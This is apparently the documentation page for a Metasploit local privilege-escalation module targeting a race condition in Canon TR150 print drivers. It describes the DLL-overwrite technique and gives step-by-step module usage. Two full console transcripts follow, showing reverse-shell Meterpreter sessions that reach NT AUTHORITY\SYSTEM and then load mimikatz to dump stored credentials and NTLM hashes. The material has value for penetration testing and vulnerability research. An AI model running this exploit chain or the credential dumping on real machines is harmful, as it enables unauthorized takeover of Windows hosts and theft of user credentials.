## Vulnerable Application

Canon TR150 print drivers versions 3.71.2.10 and below allow local users to read/write files
within the `CanonBJ` directory and its subdirectories. By overwriting the DLL at
`C:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series\\LanguageModules\\040C\\CNMurGE.dll`
with a malicious DLL at the right time whilst running the `C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs`
script to install a new printer, a timing issue can be exploited to cause the `PrintIsolationHost.exe` program,
which runs as `NT AUTHORITY\SYSTEM`, to successfully load the malicious DLL. Successful exploitation
will grant attackers code execution as the `NT AUTHORITY\SYSTEM` user.

This module leverages the `prnmngr.vbs` script
to add and delete printers. Multiple runs of this
module may be required given successful exploitation
is time-sensitive.

## Installation Instructions
1. Download the driver installer from https://pdisp01.c-wss.com/gdl/WWUFORedirectTarget.do?id=MDEwMDAxMDY5OTAx&cmp=ABR&lang=EN
1. Open up the EXE and run it as an administrator. Wait for installation to finish.
1. Go to `Add a New Printer or Scanner`, then select `The printer that I want isn't listed`. You may need to hit the refresh button for this to show up.
1. Select `Add a printer using a TCP/IP address or hostname` and click `Next`
1. Under `Device Type` select `TCP/IP device`, and enter a random nonexisting IP address.
1. Uncheck `Query the printer and automatically select the driver to use` and click `Next`.
1. Wait for a bit then once prompted for more port info select `Standard` under `Device Type` and select `Canon Network Printer` for device type.
1. On the next screen select `Canon TR150 Series` and select `Next`.
1. Select `Use the driver that is currently installed (recommended)` and select the `Next` button.
1. Select `Next` and accept the default driver name, and the driver should install.

## Verification Steps

1. Install a vulnerable Canon TR150 driver using the steps from `Installation Instructions`
2. Start `msfconsole`
3. Get a session with basic privileges
4. Do: `use exploit/windows/local/canon_driver_privesc`
5. Do: `set SESSION <sess_no>`
6. Do: `run`
7. You should get a shell running as `SYSTEM`.

## Options

## Scenarios

### Canon TR150 series v3.71.2.10 on Windows 10 Build 17134

```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.0.0.8
lhost => 10.0.0.8
msf6 exploit(multi/handler) > set lport 1270
lport => 1270
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.0.0.8:1270
[*] Sending stage (200262 bytes) to 10.0.0.7
[*] Meterpreter session 1 opened (10.0.0.8:1270 -> 10.0.0.7:49816) at 2021-08-05 11:14:25 -0400

meterpreter > getuid
Server username: MOURNLAND\lowlevel
meterpreter > sysinfo
Computer        : MOURNLAND
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/canon_driver_privesc
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/canon_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/canon_driver_privesc) > set lhost 10.0.0.8
lhost => 10.0.0.8
msf6 exploit(windows/local/canon_driver_privesc) > set session 1
session => 1
msf6 exploit(windows/local/canon_driver_privesc) > run

[*] Started reverse TCP handler on 10.0.0.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Canon language driver directory grants Users full permissions
[*] Dropping batch script to C:\Users\lowlevel\AppData\Local\Temp\YoBndh.bat
[*] Adding printer ePzTcgz...
[*] Sending stage (200262 bytes) to 10.0.0.7
[+] Deleted C:\Users\lowlevel\AppData\Local\Temp\YoBndh.bat
[+] Deleted C:\Users\lowlevel\AppData\Local\Temp\CNMurGE.dll
[*] Meterpreter session 2 opened (10.0.0.8:4444 -> 10.0.0.7:49819) at 2021-08-05 11:15:31 -0400
[*] Deleting printer ePzTcgz

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : MOURNLAND
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > quit
[*] Shutting down Meterpreter...
```

### TR150 series Printer Driver Ver.1.00 On Windows 10 20H2

```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/bind_tcp
PAYLOAD => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set RHOST 192.168.224.211
RHOST => 192.168.224.211
msf6 exploit(multi/handler) > exploit

[*] Started bind TCP handler against 192.168.224.211:4444
[*] Sending stage (200262 bytes) to 192.168.224.211
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.224.211:4444) at 2021-08-09 14:11:47 -0500

meterpreter > getuid
Server username: DESKTOP-DIK4B96\test
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/canon_driver_privesc
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/canon_driver_privesc) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/canon_driver_privesc) > show options

Module options (exploit/windows/local/canon_driver_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.224.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(windows/local/canon_driver_privesc) > set LPORT 8877
LPORT => 8877
msf6 exploit(windows/local/canon_driver_privesc) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/canon_driver_privesc) > show options

Module options (exploit/windows/local/canon_driver_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.224.128  yes       The listen address (an interface may be specified)
   LPORT     8877             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(windows/local/canon_driver_privesc) > exploit

[*] Started reverse TCP handler on 192.168.224.128:8877
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Canon language driver directory grants Users full permissions
[*] Dropping batch script to C:\Users\test\AppData\Local\Temp\ssSffWM.bat
[*] Writing DLL file to C:\Users\test\AppData\Local\Temp\CNMurGE.dll
[*] Adding printer SFywU...
[*] Deleting printer SFywU
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/canon_driver_privesc) > exploit

[*] Started reverse TCP handler on 192.168.224.128:8877
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Canon language driver directory grants Users full permissions
[*] Dropping batch script to C:\Users\test\AppData\Local\Temp\dsrlKmQ.bat
[*] Writing DLL file to C:\Users\test\AppData\Local\Temp\CNMurGE.dll
[*] Adding printer HRudL...
[*] Sending stage (200262 bytes) to 192.168.224.211
[+] Deleted C:\Users\test\AppData\Local\Temp\dsrlKmQ.bat
[+] Deleted C:\Users\test\AppData\Local\Temp\CNMurGE.dll
[*] Meterpreter session 2 opened (192.168.224.128:8877 -> 192.168.224.211:61310) at 2021-08-09 14:13:12 -0500
[*] Deleting printer HRudL

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-DIK4B96
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeImpersonatePrivilege
SeTcbPrivilege

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain           NTLM                              SHA1
--------  ------           ----                              ----
test      DESKTOP-DIK4B96  0cb6948805f797bf2a82807973b89537  87f8ed9157125ffc4da9e06a7b8011ad80a53fe1

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
DESKTOP-DIK4B96$  WORKGROUP        (null)
test              DESKTOP-DIK4B96  (null)

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
desktop-dik4b96$  WORKGROUP        (null)
test              DESKTOP-DIK4B96  (null)


meterpreter >
```